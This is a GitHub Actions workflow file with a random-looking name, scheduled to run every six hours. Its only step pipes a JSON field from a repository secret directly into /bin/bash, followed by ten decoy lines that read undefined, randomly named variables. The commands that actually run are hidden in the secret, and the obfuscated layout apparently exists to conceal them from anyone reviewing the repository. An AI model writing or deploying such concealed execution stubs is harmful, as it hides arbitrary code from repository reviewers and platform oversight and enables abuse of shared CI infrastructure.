name: chenglijiaoliang
on:
  workflow_dispatch:
  schedule:
    - cron: '15 5/6 * * *'

jobs:  # 20742
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenglijiaoliang
        env:
          mssf52: ${{ secrets.mssf52 }}
        run: |
          echo $mssf52 | jq -r .jwne58504 | /bin/bash
          echo $swgza135 | jq -r .aur0 | /bin/bash
          echo $nry1925 | jq -r .tv5 | /bin/bash
          echo $eck96 | jq -r .p5 | /bin/bash
          echo $uyqsf20560 | jq -r .anoe6 | /bin/bash
          echo $jip11058 | jq -r .xjq538 | /bin/bash
          echo $my27 | jq -r .vp8530 | /bin/bash
          echo $rtui66781 | jq -r .n5644 | /bin/bash
          echo $iljtc21 | jq -r .qjrnx70118 | /bin/bash
          echo $dbv6170 | jq -r .uos810 | /bin/bash
          echo $u4 | jq -r .gxqb133 | /bin/bash

